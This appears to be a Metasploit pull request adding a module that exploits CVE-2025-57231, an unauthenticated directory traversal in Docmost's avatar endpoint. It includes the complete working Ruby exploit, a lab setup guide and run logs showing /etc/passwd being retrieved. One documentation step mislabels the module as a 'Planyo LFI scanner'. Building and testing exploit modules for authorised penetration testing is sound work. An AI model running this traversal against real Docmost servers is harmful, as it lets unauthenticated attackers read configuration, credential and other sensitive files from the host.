### PR TITLE
Add Docmost unauthenticated arbitrary file read module (CVE-2025-57231)

### DIFF
--- a/documentation/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.md
+++ b/documentation/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.md
@@ -1,0 +1,90 @@
+## Vulnerable Application
+
+Docmost from versions 0.2.1 until 0.21.0, fails to validate file paths sent to the publicly accessible /api/attachments/img/avatar endpoint.
+The leads to an arbitrary file read vulnerability allowing unauthenticated attackers to retrieve local sensitive files.
+
+This module uses this vulnerability to retrieve the contents of arbitrary local files by performing directory traversal via avatar endpoint.
+
+### Pre-requisites
+- **Docker** and **Docker compose** installed.
+
+## Setup
+
+1. **Create a home directory and download docker-compose file**
+```
+mkdir docmost
+cd docmost
+curl -O https://raw.githubusercontent.com/docmost/docmost/main/docker-compose.yml
+```
+2. **Edit the docker-compose.yml file**
+```
+# Generate a long random secret key
+openssl rand -hex 32
+
+# Open the docker-compose.yml file and make the following changes:
+# 1. Replace `image: docmost/docmost:latest` with `image: docmost/docmost:0.21.0`
+# 2. Replace `APP_SECRET` with the random secret key generated above 
+```
+3. **Start the container**
+```
+sudo docker-compose up -d
+```
+4. **Enter Workspace details**
+
+Navigate to http://localhost:3000/ and enter dummy details for workspace name, name, email and password
+
+## Verification Steps
+1. **Launch Metasploit**
+```
+msfconsole
+```
+2. **Load the Planyo LFI scanner**
+```
+use auxiliary/gather/docmost_fileread_cve_2025_57231
+set RHOSTS 127.0.0.1
+set RPORT 3000
+set TARGETURI /
+```
+3. **Run the module**
+```
+run
+```
+4. **Observe output**
+
+The module should:
+- Check if the target is alive
+- Retrieve the file and save it locally
+
+## Options
+
+- **TARGETURI**(`/`): Base path to Docmost installation
+- **FILEPATH**(`/etc/passwd`): Path of local file to download
+
+## Scenarios
+```
+msf auxiliary(gather/docmost_fileread_cve_2025_57231) > run
+[*] Running module against 127.0.0.1
+[*] File saved to: /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin
+[*] Auxiliary module execution completed
+msf auxiliary(gather/docmost_fileread_cve_2025_57231) > cat /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin
+[*] exec: cat /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin
+
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+node:x:1000:1000::/home/node:/bin/sh
+```

--- a/documentation/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.md
+++ b/documentation/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 Docmost from versions 0.2.1 until 0.21.0, fails to validate file paths sent to the publicly accessible /api/attachments/img/avatar endpoint.
-The leads to an arbitrary file read vulnerability allowing unauthenticated attackers to retrieve local sensitive files.
+This leads to an arbitrary file read vulnerability allowing unauthenticated attackers to retrieve local sensitive files.
 
 This module uses this vulnerability to retrieve the contents of arbitrary local files by performing directory traversal via avatar endpoint.
 

--- a/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.rb
+++ b/modules/auxiliary/gather/docmost_fileread_cve_2025_57231.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  require 'uri'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Docmost Arbitrary File Read (CVE-2025-57231)',
+        'Description' => %q{
+          This module exploits an arbitrary file read vulnerability in Docmost versions from 0.2.1 to 0.21.0.
+          Docmost does not validate file paths sent to the /api/attachments/img/avatar endpoint. This endpoint is publicly accessible without any authentication.
+          This allows unauthenticated attackers to access the vulnerable endpoint directly and read arbitrary files on the server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Balachandar Gowrisankar'
+        ],
+        'References' => [
+          ['CVE', '2025-57231'],
+          ['GHSA', '59m3-fj8c-996g'],
+          ['URL', 'https://www.artresilia.com/docmost-v0-21-0-cve-2025-57231-unauthenticated-file-path-traversal']
+        ],
+        'DisclosureDate' => '2025-07-28',
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FILEPATH', [false, 'Name of the file to download', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, 'Base path to Docmost installation', '/'])
+      ]
+    )
+  end
+
+  def run
+    # Check if filename is specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error('Please supply the name of the file you want to download')
+      return
+    end
+
+    # URL encode file path
+    filepath = URI.encode_www_form_component(datastore['FILEPATH'])
+
+    # Create request
+    route = normalize_uri(
+      datastore['TARGETURI'],
+      'api',
+      'attachments',
+      'img',
+      'avatar'
+    )
+    route += "/..%2F..%2F..%2F..%2F..#{filepath}"
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => route
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'The target seems to be offline')
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP status: #{res.code} while attempting to read file")
+    end
+
+    fname = File.basename(datastore['FILEPATH'])
+
+    path = store_loot(
+      'docmost.http',
+      'application/octet-stream',
+      datastore['RHOST'],
+      res.body,
+      fname
+    )
+    print_status("File saved to: #{path}")
+  end
+end


### PR DESCRIPTION
## Description

This module exploits [CVE-2025-57231](https://github.com/advisories/GHSA-59m3-fj8c-996g), a directory traversal vulnerability in Docmost that allows arbitrary file read from version 0.2.1 to 0.21.0. The application's `/api/attachments/img/avatar` endpoint does not properly validate file paths and is publicly accessible without any authentication. This allows unauthenticated attackers to retrieve arbitrary file contents from the target by probing the `/avatar` endpoint with %2F sequences.

## Breaking Changes

None

## Reviewer Notes

I could not find a way to include a check method for this module.

## Verification Steps

1. Set up Docmost version 0.21.0 (instructions are given in the module documentation)
2. Start `msfconsole` and type use `auxiliary/gather/docmost_fileread_cve_2025_57231`
3. Set target IP, target port and target URI with `set RHOSTS`, `set RPORT` and `set TARGETURI`
4. Execute `run`. It should check if the target is online and locally save the contents of arbitrary file path.

## Test Evidence

The module was tested with Docmost versions 0.21.0 and 0.22.0(patched). For version 0.21.0, the module correctly dumps the contents of arbitrary file location. For version 0.22.0, the module correctly fails by displaying 400 status code.

**Docmost version 0.21.0**
```
msf auxiliary(gather/docmost_fileread_cve_2025_57231) > run
[*] Running module against 127.0.0.1
[*] File saved to: /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin
[*] Auxiliary module execution completed
msf auxiliary(gather/docmost_fileread_cve_2025_57231) > cat /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin
[*] exec: cat /home/kali/.msf4/loot/20260913065411_default_127.0.0.1_docmost.http_208561.bin

root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
```
**Docmost version 0.22.0 (patched)**
```
msf auxiliary(gather/docmost_fileread_cve_2025_57231) > run
[*] Running module against 127.0.0.1
[-] Auxiliary aborted due to failure: unexpected-reply: Unexpected HTTP status: 400 while attempting to read file
[*] Auxiliary module execution completed
```
## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux |
| **Target Software/Hardware** | Docmost 0.21.0 |
| **Docker Image / Vagrant Setup** | Docmost 0.21.0 + Postgres 18 + Redis 8 compose file in module documentation |

## AI Usage Disclosure

ChatGPT was used to help with suggestions for URL encoding of file path

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules`
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)